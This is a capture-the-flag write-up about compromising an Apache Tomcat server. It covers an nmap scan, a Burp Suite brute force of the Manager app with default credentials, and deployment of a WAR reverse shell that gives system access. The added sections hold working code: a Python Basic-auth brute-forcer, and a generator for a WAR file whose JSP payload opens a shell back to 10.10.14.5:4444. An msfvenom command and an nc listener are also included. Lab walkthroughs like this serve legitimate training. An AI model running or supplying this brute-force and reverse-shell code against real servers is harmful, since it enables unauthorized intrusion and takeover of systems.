By: Nicholas Werner
Starting off with an nmap scan.
Only port 8080 is open, and it is running Apache Tomcat, so I want to take a look at that.
It appears to be running the default Tomcat landing page, which is a good sign: an install that nobody bothered to customise has probably been left with default credentials as well. So I search for Apache Tomcat default credentials on Google to see what I can find.
I found a GitHub page with a list of 25 default username/password pairs.
I turn on Burp Suite to capture some traffic.
Go to Preferences in the side bar of your browser, scroll down to Network Proxy and click Settings. Here you can point the browser at Burp's proxy listener, as shown below.
Make sure that Intercept is on in the Proxy tab in Burp Suite. Refresh the Apache Tomcat page and you should intercept the request shown below. Forward it.
Click Manager App on the Apache Tomcat page. Enter a default username and password and look at Burp Suite, which has intercepted the request.
Right-click the request and click Send to Decoder.
Highlight the Base64 text in the Authorization header as shown, click Decode as, then Base64. A new panel below shows the decoded string.
You can then go back to the Proxy tab, right-click the request and click Send to Repeater. Sending it shows that the server responded with 401 Unauthorized, which means that set of credentials is incorrect.
Now I want to try a brute-force attack. I type gedit tomcat.txt to create a new file called tomcat.txt where I can store the credentials I found earlier on GitHub.
I copy and paste those credentials into the txt file.
When I used the Decoder tab earlier, I saw that the Base64 string decodes to username:password (tomcat:tomcat in this case), so I want to put all of the usernames/passwords in that format and Base64-encode each one so that Burp Suite can brute-force the login for me.
This just shows how you can encode text as Base64.
This is the script I used to turn the whole list in tomcat.txt into Base64.
Send the earlier request to the Intruder tab, click the Positions tab inside Intruder, highlight the Base64 string as shown below, and click Add on the right-hand side.
Go to the Payloads tab under Intruder, paste the Base64 strings you just created with your script, and uncheck the "URL-encode these characters" box. Base64 uses =, + and /, all of which Burp would otherwise URL-encode, and an encoded header would never match a real credential.
Click Start attack. When it finishes you will see the screen below. As you can see, one of the default credentials worked and the server sent back a 200 OK.
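The encoding script and the Intruder run above are shown only as screenshots, so here is an added example (my own code, not the author's script) that does both jobs from the command line: it turns a user:pass list into the Base64 tokens you would paste into Intruder, decodes a captured Authorization header the way Burp Decoder does, and, if you point it at a target, sends each token and reads the status code. The credential list and the target URL below are constructed placeholders, not the GitHub list or the box's real address. One caveat worth knowing: Tomcat returns 403 rather than 401 when the password is right but the account lacks the manager-gui role, so the script reports those separately instead of throwing them away.

```python
import base64
import urllib.error
import urllib.request

# Constructed sample of the user:pass list. The real list came from GitHub
# and is not reproduced here.
SAMPLE_CREDS = [
    "admin:admin",
    "tomcat:tomcat",
    "tomcat:s3cret",
    "role1:role1",
]


def encode_basic(cred: str) -> str:
    """Turn 'user:pass' into the token that follows 'Basic ' in the header."""
    return base64.b64encode(cred.encode("utf-8")).decode("ascii")


def decode_basic(header_value: str) -> str:
    """Reverse what Burp Decoder did: 'Basic dG9t...' (or a bare token) -> 'user:pass'."""
    token = header_value
    if header_value.lower().startswith("basic "):
        token = header_value.split(None, 1)[1]
    return base64.b64decode(token).decode("utf-8")


def build_payloads(creds):
    """The list of tokens to paste into Intruder's Payloads tab."""
    return [encode_basic(c) for c in creds]


def classify(status: int) -> str:
    """Interpret the status code the Manager app sends back for one attempt."""
    if status == 200:
        return "valid"
    if status == 401:
        return "invalid"
    if status == 403:
        # Password accepted but the user has no manager-gui role: still worth noting.
        return "valid-but-no-manager-role"
    return "other"


def try_login(url: str, cred: str, timeout: float = 5.0) -> int:
    """Send one request with the Authorization header set and return the status code."""
    req = urllib.request.Request(
        url, headers={"Authorization": "Basic " + encode_basic(cred)}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def brute_force(url: str, creds):
    """Try every pair and return the ones that did not come back as a plain 401."""
    hits = []
    for cred in creds:
        status = try_login(url, cred)
        verdict = classify(status)
        if verdict != "invalid":
            hits.append((cred, status, verdict))
    return hits


if __name__ == "__main__":
    # Placeholder target; replace the host with the box's address.
    TARGET = "http://10.0.0.5:8080/manager/html"
    for cred, status, verdict in brute_force(TARGET, SAMPLE_CREDS):
        print(f"{cred} -> {status} ({verdict})")
```

Run it with the target URL edited and it prints only the pairs that got a 200 or a 403; for the Intruder route, call build_payloads on the full list and paste the output into the Payloads tab with URL encoding switched off.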
Disable the proxy settings in your browser, as shown below, since we are done with Burp Suite.
Go back to the Apache Tomcat page and enter the credentials we just found.
I can now see that the Manager app lets us deploy a WAR file, so I search Google to see whether a WAR file can be used to get a shell.
I found a site listing msfvenom and Metasploit payloads, and I can see that there is a WAR payload, so I copy and paste that into a command prompt with my LHOST and LPORT.
Once I type the command below, I have a listener set up on port 4444.
I go back to the Apache Tomcat page and click Browse under the "WAR file to deploy" section to select the WAR file to upload.
Now I can see that shell.war was deployed. Click on it and the listener will pick up a connection.
The listener picked up a connection.
Now I have system access.
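The msfvenom command and the generated file only appear in screenshots above, so here is an added example (my own code, not the author's command or msfvenom's output) that shows what the uploaded shell.war actually is: a zip archive holding WEB-INF/web.xml and a JSP. The JSP connects back to LHOST:LPORT and wires a shell to the socket, choosing cmd.exe or /bin/sh from the target's os.name, which is the same idea as the java/jsp_shell_reverse_tcp payload. The JSP file name, the LHOST 10.10.14.5 and the welcome-file web.xml are my assumptions; msfvenom picks a random JSP name.

```python
import io
import zipfile

JSP_NAME = "index.jsp"  # assumption: msfvenom uses a random name instead

# Minimal deployment descriptor. The welcome-file entry makes Tomcat serve the
# JSP when you click the application's path in the Manager app.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_jsp(lhost: str, lport: int) -> str:
    """JSP that connects back to lhost:lport and pipes a shell over the socket."""
    return f'''<%@ page import="java.io.*,java.net.*" %>
<%
    // Pick the shell for whatever OS Tomcat is running on.
    String shell = System.getProperty("os.name").toLowerCase().contains("win")
        ? "cmd.exe" : "/bin/sh";
    Socket sock = new Socket("{lhost}", {lport});
    Process proc = new ProcessBuilder(shell).redirectErrorStream(true).start();
    InputStream pi = proc.getInputStream(), si = sock.getInputStream();
    OutputStream po = proc.getOutputStream(), so = sock.getOutputStream();
    while (!sock.isClosed()) {{
        // Shell output -> socket, socket input -> shell stdin.
        while (pi.available() > 0) so.write(pi.read());
        while (si.available() > 0) po.write(si.read());
        so.flush(); po.flush();
        try {{ Thread.sleep(50); }} catch (InterruptedException e) {{}}
        // exitValue() throws while the shell is still running; break once it exits.
        try {{ proc.exitValue(); break; }} catch (IllegalThreadStateException e) {{}}
    }}
    proc.destroy();
    sock.close();
%>
'''


def build_war(lhost: str, lport: int, jsp_name: str = JSP_NAME) -> bytes:
    """Return the bytes of a WAR (a plain zip) holding web.xml plus the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, build_jsp(lhost, lport))
    return buf.getvalue()


def list_war(data: bytes) -> list:
    """Names inside the archive, as a sanity check before uploading it."""
    with zipfile.ZipFile(io.BytesIO(data)) as war:
        return sorted(war.namelist())


if __name__ == "__main__":
    # LHOST/LPORT are placeholders: use your own address and the port the listener is on.
    payload = build_war("10.10.14.5", 4444)
    with open("shell.war", "wb") as f:
        f.write(payload)
    print(list_war(payload))
```

Start a listener first (for example nc -lvnp 4444), upload shell.war through the Manager's "WAR file to deploy" form, then browse to /shell/ so Tomcat compiles and runs the JSP; the listener should catch the connection. The equivalent msfvenom command, assuming the writeup used the stock WAR payload, is msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war.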
I run type "2 for the price of 1.txt" to read the file.
I have found both flags.